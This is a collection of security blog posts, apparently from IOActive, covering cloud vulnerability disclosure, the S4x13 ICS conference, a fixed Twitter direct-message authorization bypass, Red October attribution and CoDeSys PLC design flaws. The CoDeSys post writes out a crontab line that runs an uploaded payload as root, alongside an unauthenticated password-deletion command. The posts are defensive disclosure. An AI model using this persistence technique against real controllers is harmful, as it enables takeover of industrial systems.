With today’s ubiquitous cloud-based services – you don’t own the software and you don’t have any capability (or right) to patch the software. Whether it’s Twitter, Salesforce.com, Dropbox, Google Docs, or LinkedIn, etc. your data and intellectual property is in the custodial care of a third-party who doesn’t need to publicly disclose the nature (full or otherwise) of vulnerabilities lying within their backend systems – in fact most would argue that it’s in their best interest to not make any kind of disclosure (ever!).

Why would someone assign a CVE number to the vulnerability? Who’s going to have all the disclosure details to construct a CVSS score, and what would it matter if they did? Why would the service provider issue an advisory? As a bug hunter who responsibly discloses the vulnerability to the cloud service provider you’d be lucky to even get any public recognition for your valuable help.

With all that said and done, what should we take away from the marvelous briefing that NSS Labs has pulled together? In essence, there’s a lot of vulnerabilities being disclosed, and the vendors of the software we deploy on our laptops and servers still have a ways to go in improving their security development lifecycle (SDL) – some more than others.

While it would be nice to take some solace in the ranking of vulnerable vendors, I’d be more worried about the cloud vendors and their online services and the fact that they’re not showing up in these annual statistics – after all, that’s where more and more of our critical data is being stored and manipulated.

— Gunter Ollmann, CTO — IOActive, Inc.

INSIGHTS | January 25, 2013

S4x13 Conference

S4 is my favorite conference. This is mainly because it concentrates on industrial control systems security, which I am passionate about. I also enjoy the fact that the presentations cover mostly advanced topics and spend very little time covering novice topics.

Over the past four years, S4 has become more of a bits-and-bytes conference, with presentations that explain, for example, how to upload Trojan firmware to industrial controllers and exposés that cover vulnerabilities (in the “insecure by design” and “ICS-CERT” sense of the word).

This year’s conference was packed with top talent from the ICS and SCADA worlds and offered a huge amount of technical information. I tended to follow the “red team” track, as these talks covered breaking into varying levels of control systems networks.

Sergey Gordeychick gave a great talk on the vulnerabilities in various ICS software applications, including the release of an “1825-day exploit” for WinCC, which Siemens did not patch for five years. (The vulnerability was finally closed in December 2012.)

Alexander Timorin and Dmitry Sklyarov released a new tool for reversing S7 passwords from a packet capture. A common weakness of many industrial controllers is homebrew hashing algorithms and authentication mechanisms that simply fall apart under a few days of scrutiny. Their tool is being incorporated into John the Ripper. A trend in the ICS space seems to be the incorporation of ICS-specific attacks into existing attack frameworks. This makes ICS hacking far more available to network security assessors, as well as to the “Bad Guys”. My guess is that this trend will continue in 2013.
Billy Rios and Terry McCorkle talked about medical controllers and showed a Philips Xper controller that they had purchased on eBay. The computer itself had not been wiped; it contained hard-coded accounts as well as trivial buffer overflow vulnerabilities, and it was running Windows XP.
Arthur Gervais released a slew of Schneider Modicon PLC-related vulnerabilities. Schneider’s service for updating Unity (the engineering software for Modicon PLCs) and other utilities used HTTP to download software updates, for example. I was sad that I missed his talk due to a conflict in the speaking schedule.
Luigi Auriemma and his colleague Donato Ferrante demonstrated their own binary patching system, which allows them to patch applications while they are executing. The technology shows a lot of promise. They are currently marketing it as a way to provide patches for unsupported software. I think that the true potential of their system is to patch industrial systems without shutting down the process. It may take a while for any vendor to adopt this technique, but it could be a powerful motivator to get end users to apply patches. Scheduling an outage window is the most-cited reason for not patching industrial systems, and ReVuln is showing that we can work around this limitation.

My favorite talk was one that was only semi-technical in nature and more defensive than offensive. It was about implementing an SDL and a fuzz-testing strategy at OSISoft. OSISoft’s PI server is the most frequently used data historian for industrial processes. Since C-level employees want to keep track of how their process is doing, historical data often must be exported from the control systems network to the corporate network in some fashion. In the best case scenario, this is usually done by way of a PI Server in the DMZ. In the worst case scenario, a corporate system will reach into the control network to communicate with the PI server. Either way, the result is the same: PI is a likely target if an attacker wants to jump from the corporate network to the control network. It is terrific, and still all too rare, to see a software company in the ICS space sharing their security experiences.

Digital Bond provides a nice “by the numbers” look at the conference.
If you are technically and internationally minded and want to talk to actual ICS operators, S4 is a great place to start.
INSIGHTS | January 22, 2013

You cannot trust social media to keep your private data safe: Story of a Twitter vulnerability

I’m always worried about the private information I have online. Maybe this is because I have been hacking for a long time, and I know everything can be hacked. This makes me a bit paranoid. I have never trusted web sites to keep my private information safe, and nowadays it is impossible not to have private information published on the web, such as on social media web sites. Sooner or later you could get hacked; this is a fact.

Currently, many web and mobile applications give users the option to sign in using their Twitter or Facebook account. Keeping in mind the fact that Twitter currently has 200 million active monthly users (http://en.wikipedia.org/wiki/Twitter), it makes a lot of sense for third-party applications to offer users an easy way to log in. Also, since applications can obtain a wealth of information from your Twitter or Facebook account, most of the time you do not even need to register. This is convenient, and it saves time signing into third-party applications using Twitter or Facebook.

Every time I’m asked to sign in using Twitter or Facebook, my first thought is, “No way!”  I don’t want to give access to my Twitter and Facebook accounts regardless of whether I have important information there or not. I always have an uneasy feeling about giving a third-party application access to my accounts due to the security implications.

Last week I had a very interesting experience.

I was testing a web application that is under development. This application had an option to allow me to sign into Twitter. If I selected this option, the application would have access to my Twitter public feed (such as reading Tweets from my timeline and seeing who I follow). In addition, the application would have been able to access Twitter functionality on my behalf (such as following new people, updating my profile, posting Tweets for me). However, it wouldn’t have access to my private Twitter information (such as direct messages and more importantly my password). I knew this to be true because of the following information that is displayed on Twitter’s web page for “Signing in with Twitter”:

Image 1

After viewing the displayed web page, I trusted that Twitter would not give the application access to my password and direct messages. I felt that my account was safe, so I signed in and played with the application. I saw that the application had the functionality to access and display Twitter direct messages. The functionality, however, did not work, since Twitter did not allow the application to access these messages. In order to gain access, the application would have to request proper authorization through the following Twitter web page:

Image 2

The web page displayed above is similar to the previous web page (Image 1). However, it also says the application will be able to access your direct messages. Also, the blue button is different. It says “Authorize app” instead of “Sign in”. While playing with the application, I never saw this web page (image 2). I continued playing with the application for some time, viewing the functionality, logging in and out from the application and Twitter, and so on. After logging in to the application, I suddenly saw something strange. The application was displaying all of my Twitter direct messages. This was a huge and scary surprise. I wondered how this was possible. How had the application bypassed Twitter’s security restrictions? I needed to know the answer.

My surprise didn’t end here. I went to https://twitter.com/settings/applications to check the application settings. The page said “Permissions: read, write, and direct messages”. I couldn’t understand how this was possible, since I had never authorized the application to access my “private” direct messages. I realized that this was a huge security hole.

I started to investigate how this could have happened. After some testing, I found that the application obtained access to my private direct messages when I signed in with Twitter for a second or third time. The first time I signed in with Twitter on the application, it only received read and write access permissions. This gave the application access to what Twitter displays on its “Sign in with Twitter” web page (see image 1). Later, however, when I signed in again with Twitter without being already logged in to Twitter (not having an active Twitter session – you have to enter your Twitter username and password), the application obtained access to my private direct messages. It did so without having authorization, and Twitter did not display any messages about this. It was a simple bypass trick for third-party applications to obtain access to a user’s Twitter direct messages.

In order for a third-party application to obtain access to Twitter direct messages, it first has to be registered and have its direct message access level configured here: https://dev.twitter.com/apps. This was the case for the application I was testing.  In addition and more importantly, the application has to obtain authorization on the Twitter web page (see Image 2) to access direct messages. In my case, it never got this. I never authorized the application, and I did not encounter a web page requesting my authorization to give the application access to my private direct messages.

I tried to quickly determine the root cause, but I had little time and could not pin it down. I therefore decided to report the vulnerability to Twitter and let them do a deeper investigation. The Twitter security team answered quickly and took care of the issue, fixing it within 24 hours. This was impressive. Their team was very fast and responsive. They said the issue occurred due to complex code and incorrect assumptions and validations.

While I think the Twitter security team is great, I do not think the same of the Twitter vulnerability disclosure policy. The vulnerability was fixed on January 17, 2013, but Twitter has not issued any alerts/advisories notifying users.

There must be millions of Twitter users (remember, Twitter has 200 million active users) who have signed in to third-party applications with Twitter. Some of these applications might have gained access, and might still have access, to Twitter users’ private direct messages (after the security fix, the application I tested still had access to direct messages until I revoked it).

Since Twitter has not alerted its users of this issue, I think we all need to spread the word. Please share the following with everyone you know:

Check third-party application permissions here: https://twitter.com/settings/applications

If you see an application that has access to your direct messages and you never authorized it, then revoke it immediately.

Ironically, we could also use Twitter to help users. We could tweet the following:

Twitter shares your DMs without authorization, check 3rd party application permissions  https://ioactive.com/you-can-not-trust-social-media-twitter-vulnerable/ #ProtectYourPrivacy (Please RT)

I love Twitter. I use it daily. However, I think Twitter still needs a bit of improvement, especially when it comes to alerting its users about security issues when privacy is affected.

INSIGHTS | January 21, 2013

When a Choice is a Fingerprint

We frequently hear the phrase “Attribution is hard.” And yes, if the adversary exercises perfect tradecraft, attribution can be hard to the point of impossible. But we rarely mention the opposite side of that coin, how hard it is to maintain that level of tradecraft over the lifetime of an extended operation. How many times out of muscle memory have you absent-mindedly entered one of your passwords in the wrong application? The consequences of this are typically nonexistent if you’re entering your personal email address into your work client, but they can matter much more if you’re entering your personal password while trying to log into the pwned mail server of Country X’s Ministry of Foreign Affairs. People make mistakes, and the longer the timeframe, the more opportunities they have to do so.

This leads me to the recent release from Kaspersky Lab about a malware campaign referred to as “Red October”, which they have attributed to Russian hackers. There are a number of indications pointing to Russian origination, including Russian words in the source code, a Trojan dropper that enables Cyrillic before installation, and targets concentrated in Russia’s sphere of influence. Although Kaspersky has avoided naming the sponsor of the campaign as the Russian government, the targets of the malware are strongly suggestive of government sponsorship. The campaign seemed to selectively target governments, diplomatic facilities, defense, research institutes, etc. These are targets consistent with sponsors seeking geo-political intelligence, not criminals seeking profit. Kaspersky hypothesizes that the perpetrators may have collected the data to sell it, but I would argue that this is fallacious. The customer of this information would be a government, and if a government is paying criminals for the information, I would argue that’s state sponsorship.
With that context, the one data point that was most interesting to me in Kaspersky’s release was the inclusion of the word “zakladka”. As Kaspersky mentions in their report, “zakladka” is a Russian word that can mean “bookmark.” In slang it can also mean “undocumented feature” or a brick with an embedded microphone, like the kind you would sneak into an adversary nation’s embassy.
It’s delightfully poetic then, that in a piece of malware apparently intended to target embassies someone (presumably Russian) would choose to name a module “zakladka.” The United States and Russia have a rich history of attempting to bug each other’s diplomatic facilities. As early as 1945 the Soviet Union infiltrated an ingenious listening device into the office of the US ambassador to Moscow, hiding it in a wooden US Seal presented as a gift [1]. By 1964 the Soviets were able to collect extensive classified information from the US embassy through hidden microphones [2]. In 1985 construction work stopped on a new US Embassy building in Moscow after it was determined that the building was so riddled with microphones, which had been integrated into the construction, that it could never be considered secure [3].
Presumably in homage to this history, a programmer decided to name his module of code “zakladka”, which would be included in malware that is effectively the evolution of a microphone hidden in drywall. Zakladka is an appropriate name, but the very elegance with which its name matches its function undermines the deniability of the malware. In this case, it was a choice made by a programmer years ago, and it has repercussions as forensic experts attempt to unravel the source of the malware today.
It’s a reminder of how humans make mistakes. Defenders often talk about the difficulty of attribution, but as the offense we seldom talk about the challenge in gaining and maintaining network access on a target system while remaining totally unnoticed. We take it for granted.
Seemingly innocuous decisions made days, weeks, or months ago can unravel what was otherwise sound tradecraft. In this case, I just found it fascinating that the choice of name for a module, an elegantly appropriate choice, can be as strong a fingerprint for attribution as anything else.
INSIGHTS | October 30, 2012

3S Software’s CoDeSys: Insecure by Design

My last project before joining IOActive was “breaking” 3S Software’s CoDeSys PLC runtime for Digital Bond.

Before the assignment, I had a fellow security nut give me some tips on this project to get me off the ground, but unfortunately this person cannot be named. You know who you are, so thank you, mystery person.

The PLC runtime is pretty cool, from a hacker perspective. CoDeSys is an unusual ladder logic runtime for a number of reasons.

Different vendors have different strategies for executing ladder logic. Some run ladder logic on custom ASICs (or possibly interpreter/emulators) on their PLC processor, while others execute ladder logic as native code. For an introduction to reverse-engineering the interpreted code and ASIC code, check out FX’s talk on Decoding Stuxnet at C3. It really is amazing, and FX has a level of patience in disassembling code for an unknown CPU that I think is completely unique.

CoDeSys is interesting to me because it doesn’t work like the Siemens ladder logic. CoDeSys compiles your ladder logic as byte code for the processor on which the ladder logic is running. On our Wago system, it was an x86 processor, and the ladder logic was compiled x86 code. A CoDeSys ladder logic file is literally loaded into memory, and then execution of the runtime jumps into the ladder logic file. This is great because we can easily disassemble a ladder logic file, or better, build our own file that executes system calls.

I talked about this oddity at AppSec DC in April 2012. All CoDeSys installations seem to fall into three categories: the runtime is executing on top of an embedded OS, which lacks code privilege separation; the runtime is executing on Linux with a uid of 0; or the runtime is executing on top of Windows CE in single user mode. All three are bad for the same reasons.

All three mean of course that an unauthenticated user can upload an executable file to the PLC, and it will be executed with no protection. On Windows and Linux hosts, it is worse because the APIs to commit Evil are well understood.

I had said back in April that CoDeSys is in an amazing and unique position to help secure our critical infrastructure. Their product is used in thousands of product lines made by hundreds of vendors. Their implementation of secure ladder logic transfer and an encrypted and digitally signed control protocol would secure a huge chunk of critical infrastructure in one pass.

3S has published an advisory on setting passwords for CoDeSys as the solution to the ladder logic upload problem. Unfortunately, the password is useless unless the vendors (the PLC manufacturers who run CoDeSys on their PLC) make extensive modification to the runtime source code.

Setting a password on CoDeSys protects code segments. In theory, this can prevent a user from uploading a new ladder logic program without knowing the password. Unfortunately, the shell protocol used by 3S has a command called delpwd, which deletes the password and does not require authentication. Further, even if that little problem was fixed, we still get arbitrary file upload and download with the privileges of the process (remember the note about administrator/root?). So as a bad guy, I could just upload a new binary, upload a new copy of the crontab file, and wait patiently for the process to execute.
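To make that last point concrete: entries in /etc/crontab carry a user field, so the uploaded replacement only needs one extra line like the following (the path is illustrative), and cron will happily run the attacker’s binary as root every minute:

* * * * * root /tmp/.payload >/dev/null 2>&1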

The solution that I would like to see in future CoDeSys releases would include a requirement for authentication prior to file upload, a patch for the directory traversal vulnerability, and added cryptographic security to the protocol to prevent man-in-the-middle and replay attacks.